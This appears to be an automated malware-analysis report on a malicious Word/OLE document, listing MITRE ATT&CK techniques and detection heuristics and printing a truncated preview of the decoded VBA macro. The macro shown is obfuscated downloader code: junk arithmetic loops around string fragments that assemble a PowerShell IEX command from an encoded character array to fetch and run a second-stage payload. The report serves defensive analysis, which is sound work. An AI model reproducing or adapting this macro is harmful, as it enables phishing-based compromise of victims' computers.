MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is an OLE document with VBA macros, including an AutoOpen function and a Shell() call, indicating malicious intent. The VBA script constructs and executes a PowerShell command to download content from a URL and execute it. This suggests the document is a downloader for a second-stage payload.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 85,898 bytes but its declared streams total only 35,059 bytes — 50,839 bytes (59%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17071 bytes |
SHA-256: 89652d53b4476c7373b3084ee0607b71bcd87fd12ffa6bc314fdb9182ad8a69d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KlbsIzDzno"
Function KQwHrkTIVY()
On Error Resume Next
For Each sZtXMk In wVCRsq
wqJRw = (JMXzM * 90041 + 60024 * CInt(ADqYa - CDbl(63204)) * 52220 * Oct(89350))
YanviL = zBhcTD = FYjjj
uKRFZ = 95972 + Atn(34607) / 22880 / Round(87179) / 34626 / CInt(iDNlr)
Next
MtrpXlk = "OwerSHe" + "ll IEX(" + "[Str" + "ing]::jOin"
For Each baBsB In NCwwi
zrAvsj = (IiVkt * 36779 + 8006 * CInt(XtPqjO - CDbl(26510)) * 15981 * Oct(11652))
JswECb = jbtaJ = LiXjcF
HZzcpJ = 66889 + Atn(11250) / 98229 / Round(43234) / 72388 / CInt(uQiqOD)
Next
WoUni = "( '',((50 , 10" + "3, 124 ,121," + "67 ," + "68 ,120,5" + "4 , 43, " + "54, "
For Each ujJrKI In FDMLi
CQXkvW = (tsvkE * 15907 + 83521 * CInt(XdnIf - CDbl(92929)) * 21158 * Oct(11826))
hnTbDf = nrAjdt = usomBn
mBRwi = 50691 + Atn(47414) / 5884 / Round(99166) / 78960 / CInt(KZCICn)
Next
pnjfU = "120,115 , 97 ," + "59,121, 116 , 1" + "24 ,115 , 1" + "17,9" + "8,5" + "4 , 10"
For Each NCzNIL In iftQqJ
SYulC = (UEUksL * 77433 + 37473 * CInt(vmpBw - CDbl(77710)) * 72369 * Oct(54798))
tFMEv = mJfisA = XAKVI
MVwWSJ = 68554 + Atn(12659) / 51022 / Round(78751) / 24181 / CInt(jvVrw)
Next
wiROvT = "0 , 1" + "19, 1" + "20,114, 12" + "1 ,123, 45,5"
For Each QJpzi In FbTnPp
bfEPEz = (uuLYMU * 36613 + 26965 * CInt(EmfDt - CDbl(10010)) * 98238 * Oct(85597))
mRRqq = rkwlpc = QuNWVw
lOMrQ = 28095 + Atn(2541) / 68193 / Round(73801) / 93860 / CInt(jLASf)
Next
PRLwqGuaw = "0,99, 69," + " 79, 8" + "1, 82,54" + " , 43 , 54,12" + "0,11"
For Each DEPhb In hYiYV
pXjAci = (Eaabu * 14878 + 96922 * CInt(OIRjw - CDbl(27076)) * 92546 * Oct(37384))
iiJsi = hpfzw = mfjWu
rccVad = 39974 + Atn(36997) / 31957 / Round(34138) / 85809 / CInt(XtDSS)
Next
jiAFRPz = "5,97 , 59, " + "121," + "116,124,115," + " 117 , 98" + ", 5" + "4, 69,1" + "11,10" + "1,98, 11"
For Each UfaHtl In KBbcc
JDmErp = (IjXLB * 29793 + 94918 * CInt(ZDVUN - CDbl(78899)) * 3397 * Oct(28808))
jiqGP = srnjiT = pMcFln
OFioH = 70076 + Atn(97513) / 12655 / Round(14132) / 30165 / CInt(IolUIw)
Next
luJmFwbH = "5 , 123 ," + " 56,88 ,1" + "15, 98 , 5" + "6, 65, 115" + ", 116 , 8" + "5, " + "12" + "2 "
KQwHrkTIVY = MtrpXlk + WoUni + pnjfU + wiROvT + PRLwqGuaw + jiAFRPz + luJmFwbH
End Function
Function fYDPD()
On Error Resume Next
For Each sFiUN In OooOIr
DOHmi = (Bzfcm * 68993 + 46549 * CInt(aizUEd - CDbl(97003)) * 87439 * Oct(65449))
urwZSv = zPIpth = qEzHMc
kpooJp = 87767 + Atn(8594) / 26930 / Round(17630) / 18712 / CInt(drmGcj)
Next
oEXVswSAR = ",127" + ",115 ,120,98" + " , 45" + ", 50,6" + "7 ,123"
For Each roUQBj In Aizjqj
kKBJl = (GrtBw * 61567 + 26421 * CInt(HDwVb - CDbl(56166)) * 71180 * Oct(8182))
ZnHNo = EhSdb = hkwqXd
uSRVS = 85776 + Atn(86692) / 51005 / Round(3513) / 22807 / CInt(DUjuc)
Next
KLBpf = ",9" + "9 , 112" + ", " + "71, 5" + "4 ,"
For Each ivRbp In jCmKZ
BiDzk = (wISoU * 91947 + 78809 * CInt(VDZGM - CDbl(74823)) * 16271 * Oct(51083))
cLZFw = SjhTHA = LDjWzT
paVmm = 98140 + Atn(55348) / 55798 / Round(60880) / 95802 / CInt(KbSboK)
Next
Avzoh = "43," + " 5" + "4 , 49 , 126 , " + "98, 98 ,102," + "44 " + ", 57 ,57, 98,11"
For Each wXAIm In hCosWX
poXWBp = (TzIpAk * 62259 + 94634 * CInt(OkOZT - CDbl(98955)) * 92964 * Oct(5410))
ntFjKk = IHzVD = ZwXkwP
HCwkd = 49115 + Atn(14876) / 14456 / Round(95822) / 43751 / CInt(sUpOwh)
Next
PwzJQRvc = "0 , 12" + "4, 113," + " 119," + " 97, 116 ," + "123 , 5" + "6," + " 117,1"
For Each oXirci In VSKQBi
jrZlz = (GldzK * 71315 + 15220 * CInt(jGLCqA - CDbl(19085)) * 84548 * Oct(54705))
aNIIG = rwnoLc = dzMdD
jhrazl = 23432 + Atn(99160) / 27556 / Round(20948) / 66066 / CInt(pPJKjM)
Next
LUEhT = "21 ,123 , 57 " + ",68,122 , 1" + "14, 94 , " + "35 ,"
fYDPD = oEXVswSAR + KLBpf + Avzoh + PwzJQRvc + LUEhT
End Function
Function zVMCZXrS()
On Error Resume Next
For Each ijHOzS In GqiCd
Gzsij = (KWuzcl * 10433 + 96181 * CInt(NHSPA - CDbl(61983)) * 47854 * Oct(27249))
StHffW = LhLkr = abwBa
ifcrUv = 86010 + Atn(67060) / 30310 / Round(74518) / 56913 / CInt(hjQPpi)
Next
inVGq = " 113,110 ," + "57 ,86, " + "126 , 98 ,98" + ",102
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.